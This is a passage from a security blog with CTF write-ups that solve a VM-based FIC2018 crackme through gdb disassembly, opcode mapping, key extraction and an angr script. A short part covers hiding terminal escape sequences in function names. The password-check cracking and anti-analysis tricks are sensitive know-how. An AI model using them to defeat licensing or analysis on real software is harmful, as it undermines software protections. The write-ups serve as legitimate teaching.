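            pos = match.end()
            continue
        if col < len(line):
            line[col] = text[pos]   # overwrite what was printed before
        else:
            line.append(text[pos])
        col += 1
        pos += 1
    return "".join(line)


names = ["%s\x1b[1Dcalling" % first for first in "ABC"]

if __name__ == "__main__":
    for name in names:
        print(repr(name), "->", render(name))
```

Printing with repr(), or piping a tool's output through something like cat -v, is the quick way to spot such names during an analysis.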

5/2/ Fun with IDA

You can play with IDA. IDA doesn't recognize these characters and replaces them with _. How in the world would you debug a binary calling functions ____() and ____() and ____() which are different?
I think there is a lot of room for improvement here; I'll try to write another blogpost with funny sequences.

6/ The End

I think this blogpost is waaaaay too long, so I'll finish it here. Code will be posted to github, it's just a python script which patches addresses in a binary.

Today not possible. Tomorrow possible.
0xMitsurugi

Tuesday, January 30, 2018

Solving a CTF chall the [academic|hardest] way (FIC2018)

My previous articles on solving a crackme have gained some attention, so I'm doing the next one (and the last, I promise). This time, I'll explain how to solve a crackme based on a VM. There is a lot more asm than in the previous solutions :-)

This is a more academic blogpost where I'll try to explain how to understand the logic behind the VM and the crackme.

1/ A bit of technique first.

Basically, when you implement a VM, you have to create a virtual CPU. This virtual CPU will have its own registers, memory, CPU flags. This virtual CPU will fetch, decode and execute instructions. Instructions are sequences of bits (for simplification, imagine a byte), and instructions can take 0 to N arguments.

If, in pseudo code, we want to compute 13 xor 37, we can imagine this sequence of instructions:

PUT 13 in register (say, R1)
PUT 37 in another register (say, R2)
XOR R1 with R2

After that, it's just encoding. If PUT is encoded as 0x42, registers by their numbers, and XOR as 0xff, the logical sequence will be:

0x42 0x13 0x1
0x42 0x37 0x2
0xff 0x1 0x2

Easy. Those are just conventions. The program is: 0x421301423702ff0102

And the CPU will work with this. The instruction pointer is at offset 0x00.

Fetch: 0x42
Decode: that's a PUT. It takes 2 arguments: value, then register. Increase the instruction pointer by 3.
Execute: moving value at (instruction pointer +1) to register (instruction pointer +2).

Fetch 0x42
and so on..

So if you want to break a VM, you have to learn where the instruction pointer is, where the registers are stored, and how to decode the assembly. You have to figure out that 0x42 is a PUT in the previous example. How? That's the difficulty.
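The toy encoding above is small enough to emulate in a few lines. Here is a minimal Python sketch of the fetch-decode-execute loop for that made-up instruction set; storing the XOR result in the first register is an assumption, since the pseudo code doesn't say where the result goes, and `run` is a hypothetical name.

```python
PUT, XOR = 0x42, 0xFF   # opcodes of the made-up example above


def run(program: bytes) -> dict:
    """Execute the toy program and return the final registers."""
    regs = {}
    ip = 0                                   # instruction pointer
    while ip < len(program):
        opcode = program[ip]                 # fetch
        if opcode == PUT:                    # decode: PUT value, register
            value, reg = program[ip + 1], program[ip + 2]
            regs[reg] = value                # execute
        elif opcode == XOR:                  # decode: XOR register, register
            dst, src = program[ip + 1], program[ip + 2]
            regs[dst] = regs[dst] ^ regs[src]  # assumption: result goes to dst
        else:
            raise ValueError("unknown opcode 0x%02x at offset %d" % (opcode, ip))
        ip += 3                              # every instruction is 3 bytes long
    return regs


if __name__ == "__main__":
    final = run(bytes.fromhex("421301423702ff0102"))
    print({reg: hex(value) for reg, value in final.items()})
```

A real VM rarely has fixed-size instructions, which is exactly why finding the decode logic is the hard part.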

Now, back to our crackme. This is a VM, so we have a program which emulates a CPU. So we have to find a big loop: the fetch-decode-execute loop. Once found, you'll know where the instruction pointer is, and where the instructions are.

Next, you'll have to understand the instructions. Once that's done, it gets even easier: understand the program logic, break it, solve the chall, gain points.

2/ Find where things take place

Take time to read the assembly, and follow the dots 1, 2, 3...

mitsurugi@dojo:~/chall/FIC2018/v24$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb$ disass main
Dump of assembler code for function main:
   0x0000000000400530 <+0>: push   %rbx
   0x0000000000400531 <+1>: mov    $0x1000,%edi
   0x0000000000400536 <+6>: callq  0x400510 <malloc@plt>
   0x000000000040053b <+11>: or     $0xffffffff,%edx
   0x000000000040053e <+14>: test   %rax,%rax
   0x0000000000400541 <+17>: mov    %rax,0x2023d0(%rip)        # 0x602918 <stack>
   0x0000000000400548 <+24>: je     0x40059a <main+106>

//Here is a big loop. The fetch-decode-execute one, probably.
//We read something at 0x602914 (regs+20)
1.   0x000000000040054a <+26>: movslq 0x2023c3(%rip),%rax        # 0x602914 <regs+20>
     0x0000000000400551 <+33>: cmpb   $0xee,0x601440(%rax)       //if equals to 0xee goto end
     0x0000000000400558 <+40>: je     0x40058c <main+92>
3.   0x000000000040055a <+42>: mov    $0x602800,%ebx             //ebx will get increments from 0x10 to 0x10
     0x000000000040055f <+47>: mov    (%rbx),%edx                
     0x0000000000400561 <+49>: movslq 0x2023ac(%rip),%rax        # 0x602914 <regs+20>
     0x0000000000400568 <+56>: test   %edx,%edx  
     0x000000000040056a <+58>: je     0x400582 <main+82>         
4.   0x000000000040056c <+60>: movzbl 0x601440(%rax),%eax        //we fetch the byte @0x601440+rax
     0x0000000000400573 <+67>: cmp    %edx,%eax                  //if eax==edx we call something. That's decode part.
     0x0000000000400575 <+69>: jne    0x40057c <main+76>
     0x0000000000400577 <+71>: xor    %eax,%eax
5.   0x0000000000400579 <+73>: callq  *0x8(%rbx)                 //the call. Probably the execute part.
     0x000000000040057c <+76>: add    $0x10,%rbx
     0x0000000000400580 <+80>: jmp    0x40055f <main+47>         
     0x0000000000400582 <+82>: inc    %eax                       
//The regs+20 gets increased one by one -> so we step in the VM code probably.
2.   0x0000000000400584 <+84>: mov    %eax,0x20238a(%rip)        # 0x602914 <regs+20> 
     0x000000000040058a <+90>: jmp    0x40054a <main+26>

//from here, this is the end of the program
   0x000000000040058c <+92>: mov    0x202385(%rip),%rdi        # 0x602918 <stack>
   0x0000000000400593 <+99>: callq  0x4004c0 <free@plt>
   0x0000000000400598 <+104>: xor    %edx,%edx
   0x000000000040059a <+106>: mov    %edx,%eax
   0x000000000040059c <+108>: pop    %rbx
   0x000000000040059d <+109>: retq   
End of assembler dump.
gdb$

We almost understand how this VM works.

The instruction pointer is stored at regs+20 (0x602914); we fetch the instruction byte at 0x601440 plus the value in regs+20.
The byte is read, then compared to the values at 0x602800, 0x602810, 0x602820 and so on. This is the decode part.
Then the callq *0x8(%rbx) is the execute part.

Fetch, decode, execute.
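The loop in main can be modelled in a few lines of Python. This is only a sketch of my reading of the disassembly above, not the crackme's source: the names run, table and skip3 are made up for the illustration, and the handler table is a plain Python list instead of the zero-terminated array at 0x602800.

```python
END = 0xEE  # byte that stops the VM (the cmpb $0xee in main)

def run(code, table, regs):
    """Fetch-decode-execute loop modelled on main.

    code  : bytes of the VM program (g_data in the binary)
    table : list of (opcode, handler) pairs, a stand-in for 0x602800
    regs  : dict holding the instruction pointer under the key "ip"
    """
    executed = []
    while code[regs["ip"]] != END:            # 1. fetch, stop on 0xee
        for opcode, handler in table:         # 3. walk the handler table
            if code[regs["ip"]] == opcode:    # 4. decode (byte is re-read each time)
                executed.append(opcode)
                handler(code, regs)           # 5. execute
        regs["ip"] += 1                       # 2. step to the next byte
    return executed

def skip3(code, regs):
    """Toy handler (hypothetical): consume three operand bytes."""
    regs["ip"] += 3

program = bytes([0x00, 0xDD, 0xBB, 0x00, 0x13, END])
regs = {"ip": 0}
trace = run(program, [(0xDD, skip3)], regs)
print([hex(op) for op in trace], regs["ip"])
```

Note that the byte under the instruction pointer is read again for every table entry, even after a handler has moved the pointer. That detail matters later, when a handler leaves the pointer on an operand byte.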

We know how the virtual CPU works. Let's dive into the details. First, what do we have around the instruction pointer:

gdb$ x/16wx 0x601440
0x601440 <g_data>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601450 <g_data+16>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601460 <g_data+32>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601470 <g_data+48>: 0x00000000 0x00000000 0x00000000 0x00000000
gdb$

We have a lot of 00 (a NOP maybe?). What next?

gdb$ x/160wx 0x601440
0x601440 <g_data>: 0x00000000 0x00000000 0x00000000 0x00000000
 (snip ... snip ...snip)
0x601570 <g_data+304>: 0x00000000 0x0001e155 0x0c0d0300 0x0000e255
0x601580 <g_data+320>: 0x0cf20000 0x0000bb33 0xddf20000 0xcc1300bb
0x601590 <g_data+336>: 0x000000bb 0xbbdd0100 0xbbcc3700 0x00000000
0x6015a0 <g_data+352>: 0x00bbdd01 0x00bbccd3 0x01000000 0x3d00bbdd
0x6015b0 <g_data+368>: 0x0000bbcc 0xdd010000 0xccc000bb 0x000000bb
0x6015c0 <g_data+384>: 0xbbdd0100 0xbbccde00 0x00000000 0x00bbdd01
0x6015d0 <g_data+400>: 0x00bbccab 0x01000000 0xad00bbdd 0x0000bbcc
0x6015e0 <g_data+416>: 0xdd010000 0xcc1d00bb 0x000000bb 0xbbdd0100
0x6015f0 <g_data+432>: 0xbbccea00 0x00000000 0x00bbdd01 0x00bbcc13
0x601600 <g_data+448>: 0x01000000 0x3700bbdd 0x0000bbcc 0xaa010000
0x601610 <g_data+464>: 0x000000bb 0xbb33f200 0x00000001 0x02bbaa7a
0x601620 <g_data+480>: 0xf3000000 0x0003bb33 0x66600000 0x990100ab
0x601630 <g_data+496>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x601640 <g_data+512>: 0x000000bb 0xbb33f400 0x00000001 0x02bbaab2
0x601650 <g_data+528>: 0xf5000000 0x0003bb33 0x664e0000 0x990100ab
0x601660 <g_data+544>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x601670 <g_data+560>: 0x000000bb 0xbb33f600 0x00000001 0x02bbaab4
0x601680 <g_data+576>: 0xf7000000 0x0003bb33 0x66bb0000 0x990100ab
0x601690 <g_data+592>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x6016a0 <g_data+608>: 0x000000bb 0xbb33f800 0x00000001 0x02bbaae6
0x6016b0 <g_data+624>: 0xf9000000 0x0003bb33 0x66d40000 0x990100ab

The first non-zero byte is 0x55. This is probably the beginning of the code.
Now the decode part, if we look at what we have in 0x602800:

gdb$ x/20wx 0x602800
0x602800 <vm_func>: 0x00000011 0x00000000 0x00400696 0x00000000
0x602810 <vm_func+16>: 0x00000099 0x00000000 0x00400a40 0x00000000
0x602820 <vm_func+32>: 0x00000022 0x00000000 0x00400798 0x00000000
0x602830 <vm_func+48>: 0x00000033 0x00000000 0x00400697 0x00000000
0x602840 <vm_func+64>: 0x00000044 0x00000000 0x00400799 0x00000000
gdb$ x/x 0x00400696                  //What is there?
0x400696 <vm_ret>: 0x77058bc3   // oooh, the beginning of vm_ret :)
gdb$ x/x 0x00400a40
0x400a40 <vm_jnz>: 0x1ece058b   //and vm_jnz, and the others ^_^
gdb$

Ok. So the program reads a byte in the g_data part. Then it calls a function depending on this byte.

That's really, really a good point. We have a byte, and a function. It doesn't take long to understand that this is the assembly language of the VM:

0x11 is vm_ret RETURN
0x99 is vm_jnz JUMP if NON ZERO
0x22 is vm_cll CALL
0x33 is vm_mov MOVE
0x44 is vm_push PUSH
0x55 is vm_ecl ??
0x66 is vm_cmp COMPARE
0x77 is vm_jmp JUMP
0x88 is vm_jzz JUMP if ZERO
0xaa is vm_mvp ?? move? pointer maybe?
0xbb is vm_and AND
0xcc is vm_add ADD
0xdd is vm_xor XOR
0x00 is NOP (we guessed it)
0xee is END (we guessed it also)

Ladies and gentlemen, the asm of the VM.
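To keep this table at hand while reading g_data, it can be written down as a small lookup. This is just a convenience sketch: the mnemonics are the symbol names listed above, while the names "nop", "end" and the helper mnemonic() are mine.

```python
# Opcode byte -> handler name, as read from the vm_func table
OPCODES = {
    0x11: "vm_ret", 0x99: "vm_jnz", 0x22: "vm_cll", 0x33: "vm_mov",
    0x44: "vm_push", 0x55: "vm_ecl", 0x66: "vm_cmp", 0x77: "vm_jmp",
    0x88: "vm_jzz", 0xAA: "vm_mvp", 0xBB: "vm_and", 0xCC: "vm_add",
    0xDD: "vm_xor",
    0x00: "nop",   # guessed: no handler, the VM just moves on
    0xEE: "end",   # guessed: stops the main loop
}

def mnemonic(byte):
    """Return the handler name for a byte, or flag it as invalid."""
    return OPCODES.get(byte, "invalid (0x%02x)" % byte)

for b in (0x55, 0xDD, 0x0C):
    print(hex(b), mnemonic(b))
```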

3/ Let's see what happens

So, the first byte is vm_ecl. In order to quickly run the binary, we break at 0x0000000000400573 only if $rax!=0:

gdb$ b * 0x0000000000400573 if $rax!=0
Breakpoint 3 at 0x400573
gdb$ c
Continuing.
gdb$ info reg rax
rax            0x55 0x55
gdb$ disass vm_ecl
Dump of assembler code for function vm_ecl:
   0x0000000000400d28 <+0>: mov    eax,DWORD PTR [rip+0x201be6]        # 0x602914 <regs+20>
   0x0000000000400d2e <+6>: lea    edx,[rax+0x1]
   0x0000000000400d31 <+9>: mov    DWORD PTR [rip+0x201bdd],edx        # 0x602914 <regs+20>
   0x0000000000400d37 <+15>: movsxd rdx,edx
   0x0000000000400d3a <+18>: mov    dl,BYTE PTR [rdx+0x601440]
   0x0000000000400d40 <+24>: cmp    dl,0xe1
   0x0000000000400d43 <+27>: je     0x400d6f <vm_ecl+71>
   0x0000000000400d45 <+29>: cmp    dl,0xe2
   0x0000000000400d48 <+32>: je     0x400de2 <vm_ecl+186>
   0x0000000000400d4e <+38>: cmp    dl,0xe0
   0x0000000000400d51 <+41>: jne    0x400e55 <vm_ecl+301>
(...)
   0x0000000000400d6a <+66>: call   0x400520 <exit@plt>
(...)
   0x0000000000400ddd <+181>: jmp    0x4004d0 <write@plt>
(...)
   0x0000000000400e50 <+296>: jmp    0x4004e0 <read@plt>

Well, a switch case. Depending on whether the next byte is 0xe1, 0xe2 or 0xe0, this function behaves differently. It contains calls to read, write and exit, so it should be the input/output instruction. Let's step over it for the moment, and see what happens:

gdb$ stepo
Temporary breakpoint 4 at 0x40057c
ENTER PASS :
gdb$

That's it. Let's go back to the VM disassembly a bit. We had:

0x601570 <g_data+304>: 0x00000000 0x0001e155 0x0c0d0300 0x0000e255
0x601580 <g_data+320>: 0x0cf20000 0x0000bb33 0xddf20000 0xcc1300bb

Put in the right order: 55 e1 01 00 00 03 0d 0c 55 e2 00 00 00 00 f2 0c 33 bb... 55 is I/O, e1 seems to be output, the numbers after it are unknown (probably the address of the string), and the next instruction should be 55 e2 (waiting for input). Let's see the next instruction:
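Reordering the bytes by hand is error-prone, because gdb prints each 32-bit word in little-endian order. A short sketch with the standard struct module does the conversion; the word values are copied from the dump above, and the variable names are mine.

```python
import struct

# The two rows at g_data+304 and g_data+320, as printed by x/wx
words = [0x00000000, 0x0001e155, 0x0c0d0300, 0x0000e255,
         0x0cf20000, 0x0000bb33, 0xddf20000, 0xcc1300bb]

# "<I" packs each word as 4 little-endian bytes, i.e. memory order
stream = b"".join(struct.pack("<I", w) for w in words)

code = stream[4:]  # skip the first word, which is still all zeroes
print(" ".join("%02x" % b for b in code))
```

The output starts with 55 e1 and ends with dd bb 00 13 cc, which is the first vm_xor followed by the opcode of the first vm_add.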

gdb$ info reg rax
rax            0x0c 0x0c
gdb$

The next instruction is 0x0c?? As if the instruction pointer had missed a step.
In our case, that's not really important: 0x0c is not a valid instruction, so the loop walks through all the vm_func entries without a match, moves on to the next byte, and then reads 0x55. Let's continue and step over the vm_ecl function:

gdb$ stepo
Temporary breakpoint 5 at 0x40057c
ABCDEFABCDEF                       //entered myself
0x0000000000400580 in main ()
gdb$
gdb$ x/x 0x602914
0x602914 <regs+20>: 0x00000143    //offset of the instruction pointer
gdb$ x/wx 0x601440+0x143
0x601583 <g_data+323>: 0x00bb330c    //the instruction pointer
gdb$

And once again, we land on the invalid 0x0c instruction. vm_ecl doesn't advance the instruction pointer all the way to the next instruction. The VM is built in such a way that it doesn't matter, as long as the byte it lands on is an invalid instruction... This is kind of a bug!

Let's fast forward a bit, until a 0xdd instruction (XOR):

Now, a bit of refactoring, this is just the VM assembly extracted from g_data:
0xdd 0xbb 0x00 0x13 //vm_xor
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01 //vm_add
0xdd 0xbb 0x00 0x37 //vm_xor
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01 //vm_add
0xdd 0xbb 0x00 0xd3
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01
0xdd 0xbb 0x00 0x3d
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01
0xdd 0xbb 0x00 0xc0
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01

Seeing a pattern? 0xbb should be an offset to somewhere, the last byte of each XOR is the key, and we slide this offset one by one. In pseudo code, it becomes:

xor(pass[i], 0x13)
i = i+1
xor(pass[i], 0x37)
i = i+1
etc...

We extract the key: 0x1337d33dc0 just by reading the vm assembly.
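The same reading can be automated. The sketch below walks the extracted VM assembly and collects the last byte of each vm_xor. It assumes the instruction lengths seen in the listing (4 bytes for this form of vm_xor, 7 bytes for this form of vm_add); extract_key is a name I made up.

```python
# VM assembly copied from the listing above
code = bytes.fromhex(
    "ddbb0013" "ccbb0000000001"
    "ddbb0037" "ccbb0000000001"
    "ddbb00d3" "ccbb0000000001"
    "ddbb003d" "ccbb0000000001"
    "ddbb00c0" "ccbb0000000001"
)

XOR_LEN, ADD_LEN = 4, 7  # lengths observed in the listing, not a general rule

def extract_key(code):
    """Collect the immediate byte of every vm_xor found in code."""
    key = bytearray()
    i = 0
    while i < len(code):
        if code[i] == 0xDD:        # vm_xor: opcode, 0xbb, register, key byte
            key.append(code[i + 3])
            i += XOR_LEN
        elif code[i] == 0xCC:      # vm_add: skip it entirely
            i += ADD_LEN
        else:                      # anything else: move on byte by byte
            i += 1
    return bytes(key)

print(extract_key(code).hex())
```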

And what about the instruction pointer? Does it point to the right instruction after a vm_xor?

gdb$ info reg rax
rax            0xcc 0xcc
gdb$

Yep, it works, so the vm_xor instruction advances the instruction pointer correctly.

The next steps are to understand other vm_XXX instructions, where data is stored, what is done with it, and so on.

Just step through the functions and mark all known addresses (base address, offsets, registers, CPU flags), and you'll quickly be able to reverse any VM code. Follow the vm_cmp instruction, learn where the offsets are, and compare the bytes yourself.

4/ Why does the crackme accept more than one solution?

As we saw, sometimes the instruction pointer is not advanced to the next instruction. If the byte it lands on is an illegal instruction, nothing happens. But if it lands on a known opcode, that instruction gets executed and the behavior changes.
0xF4b found that vm_mov is also buggy: a 0xbb instruction (vm_and) is called instead of the vm_cmp, and the JNZ is never called afterwards.

5/ Conclusion

Thank you for scrolling this far ;-) Learn to pwn crackme.
If you want the a.out file to play with it, drop me a DM or email.

Those who want to do will find a way.

Those who don't want to do search an excuse.

0xMitsurugi

Sunday, 28 January 2018

Solving a CTF chall the [crazy|OMG] way (FIC2018)

This is the third blogpost about the same crackme, you can read the first two here:

This time, an extremely simple solution. You thought that pin was almost cheating? Get ready to see worse.

1/ Basic recon

mitsurugi@dojo:~/chall/FIC2018/v24$ ls -l a.out 
-rwxr-xr-x 1 mitsurugi mitsurugi 15568 janv. 24 14:30 a.out
mitsurugi@dojo:~/chall/FIC2018/v24$ strings a.out 
/lib64/ld-linux-x86-64.so.2
libc.so.6
exit
read
malloc
__libc_start_main
write
free
__gmon_start__
GLIBC_2.2.5
tPHc
fffff.
[]A\A]A^A_
;*3$"
FAILEDnWINnENTER PASS :              //look at this line
 (... snip snip snip ...)
mitsurugi@dojo:~/chall/FIC2018/v24$

So, we imagine that FAILED means fail and WIN is the winning message, right?

That's all we need to know!
Yes. gdb? nope. asm? nope. reversing capabilities? nope. Laziness? A lot.

2/ Hey, you like surprises and python?

You know angr, right? If not, check out this awesome program. It can explore binaries, instrument them, modify them on the fly, explore all paths, and all by itself!

It blew my mind on this one:

#! /usr/bin/env python
# You are not judged because you fall. 
# You are judged by the way you get up after a fall.
#                          0xMitsurugi

import angr, datetime

print "Starting"
start = datetime.datetime.now()
#Loading the binary
proj = angr.Project('./a.out')
#Create a simulation manager
simgr = proj.factory.simgr()
#We search the word WIN somewhere in the file descriptor 1 (standard output)
simgr.explore(find=lambda s: "WIN" in s.posix.dumps(1))

#angr works hard here ...

#Let's see which input produce a 'WIN' in output
s = simgr.found[0]
# file descriptor 0 is standard input
flag = s.posix.dumps(0)

print "The flag is: %s " % flag
#At least we know this challenge is buggy..
print "\nWe know this challenge is bugged :("
print "Flag in hex is: %s" % (flag.encode('hex'))
end = datetime.datetime.now()
print "Time used: %s" % (end - start)

Basically we tell angr to open the binary and explore it (like fuzzing, but better :) ) until it finds the word "WIN" in the standard output. Then we print the standard input which generated this output. Sounds crazy?

And, as you can guess, in only 7 minutes, without any prior knowledge:

mitsurugi@dojo:~/chall/FIC2018/v24$ ./solver.py 
Starting
The flag is: iWaseMyTime 

We know this challenge is bugged :(
Flag in hex is: 6957617300654d7954696d65
Time used: 0:07:22.198219
mitsurugi@dojo:~/chall/FIC2018/v24$

Without the bug, angr would have found the intended flag, but it remains impressive: the angr solution works. The only thing to know is that the binary prints WIN on victory, which can be found with a strings command.
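The hex dump tells more than the printed flag. A quick comparison with the flag recovered in the gdb write-up (iWasteMyTime) shows where angr's input differs; this is a small sketch, the variable names are mine.

```python
found = bytes.fromhex("6957617300654d7954696d65")   # "Flag in hex" from the run above
expected = b"iWasteMyTime"                          # flag from the gdb write-up

# Positions where the two 12-byte strings disagree
diff = [i for i, (a, b) in enumerate(zip(found, expected)) if a != b]

print(len(found), diff, hex(found[4]))
```

Only the fifth byte differs: angr picked 0x00 where the intended flag has a 't'. The terminal doesn't display the NUL byte, which is why the flag shows up as "iWaseMyTime".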

Ready? Prepare yourself!

0xMitsurugi

Solving a CTF chall the [hard|good] way (FIC2018)

Hope you liked my last blogpost http://0x90909090.blogspot.fr/2018/01/solving-ctf-chall-easylazy-way-fic2018.html , this is the same binary, with a different analysis.

This crackme is simple enough to be used for learning purposes. I'm taking it for another round of reversing. This time, it's gdb-fu! In the CTF, this was my first approach, but pin was faster :-)

1/ Basics

We remember the function names vm_xor and vm_cmp. The other functions look more like standard operations (JNZ, JMP, call, and so on).
The binary is not stripped, and we see a variable called 'regs'. We guess these are the registers of the VM. While running under gdb, we can print their contents with x/8wx &regs

2/ XOR part

In gdb, we have breakpoints, and we can execute commands at each breakpoint. We'll break at vm_xor and see what happens. I don't use any gdbinit scripts because it's a VM, and my gdb scripts are meant to be used with known CPUs (ARM/Intel). The goal here is to count how many times the vm_xor function is called, and see if we can gain some insight into what is going on:

mitsurugi@dojo:~/chall/FIC2018/v24$ gdb -q -nx ./a.out
Reading symbols from ./a.out...(no debugging symbols found)...done.
(gdb) b * vm_xor 
Breakpoint 1 at 0x400c9e
(gdb) commands 
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>echo vm_xor is called\n
>c
>end
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :first try

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called

FAILEDn[Inferior 1 (process 4165) exited normally]
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :1

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called
Breakpoint 1, 0x0000000000400c9e in vm_xor ()
vm_xor is called

FAILEDn[Inferior 1 (process 4169) exited normally]
(gdb)

Ok, so we understand that vm_xor is called 12 times, whatever the length of the PASS is.

We now hope that vm_xor works like a regular XOR: it takes two arguments from registers. Let's inspect this:

(gdb) commands 1
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>x/8wx &regs
>c
>end
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :123456ABCDEF

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f2 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x0000014b 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f3 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x00000156 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f4 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x00000161 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f5 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x0000016c 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f6 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x00000177 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f7 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x00000182 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f8 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x0000018d 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000f9 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x00000198 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000fa 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x000001a3 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000fb 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x000001ae 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000fc 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x000001b9 0x00603010 0x00000000

Breakpoint 1, 0x0000000000400c9e in vm_xor ()
0x602900 <regs>: 0x000000fd 0x00000000 0x00000000 0x00000000
0x602910 <regs+16>: 0x00000000 0x000001c4 0x00603010 0x00000000
FAILEDn[Inferior 1 (process 4291) exited normally]
(gdb)

Ok, so we don't see any of our PASS in the registers. The first one increases by one at each call, and the 6th one increases by 0xb (11) at each call. They could be relative addresses, offsets, or anything. Let's dive into the vm_xor function. It must contain an XOR operation, and it could be interesting to see the operands of that instruction:

(gdb) disassemble vm_xor 
Dump of assembler code for function vm_xor:
   0x0000000000400c9e <+0>: mov    0x201c70(%rip),%eax        # 0x602914 <regs+20>
   0x0000000000400ca4 <+6>: lea    0x1(%rax),%edx
   0x0000000000400ca7 <+9>: mov    %edx,0x201c67(%rip)        # 0x602914 <regs+20>
   0x0000000000400cad <+15>: movslq %edx,%rdx
   0x0000000000400cb0 <+18>: mov    0x601440(%rdx),%dl
   0x0000000000400cb6 <+24>: cmp    $0xab,%dl
   0x0000000000400cb9 <+27>: jne    0x400cf0 <vm_xor+82>
   0x0000000000400cbb <+29>: lea    0x2(%rax),%edx
   0x0000000000400cbe <+32>: add    $0x3,%eax
   0x0000000000400cc1 <+35>: mov    %eax,0x201c4d(%rip)        # 0x602914 <regs+20>
   0x0000000000400cc7 <+41>: cltq   
   0x0000000000400cc9 <+43>: movslq %edx,%rdx
   0x0000000000400ccc <+46>: movzbl 0x601440(%rax),%eax
   0x0000000000400cd3 <+53>: movzbl 0x601440(%rdx),%edx
   0x0000000000400cda <+60>: mov    0x602900(,%rax,4),%eax
   0x0000000000400ce1 <+67>: movslq 0x602900(,%rdx,4),%rdx
   0x0000000000400ce9 <+75>: xor    %al,0x601440(%rdx)         //HERE
   0x0000000000400cef <+81>: retq   
   0x0000000000400cf0 <+82>: cmp    $0xbb,%dl
   0x0000000000400cf3 <+85>: jne    0x400d27 <vm_xor+137>
   0x0000000000400cf5 <+87>: lea    0x2(%rax),%edx
   0x0000000000400cf8 <+90>: add    $0x3,%eax
   0x0000000000400cfb <+93>: mov    %eax,0x201c13(%rip)        # 0x602914 <regs+20>
   0x0000000000400d01 <+99>: cltq   
   0x0000000000400d03 <+101>: movslq %edx,%rdx
   0x0000000000400d06 <+104>: movzbl 0x601440(%rdx),%edx
   0x0000000000400d0d <+111>: movslq 0x602900(,%rdx,4),%rcx
   0x0000000000400d15 <+119>: mov    0x601440(%rcx),%dl
   0x0000000000400d1b <+125>: xor    0x601440(%rax),%dl         //and HERE 
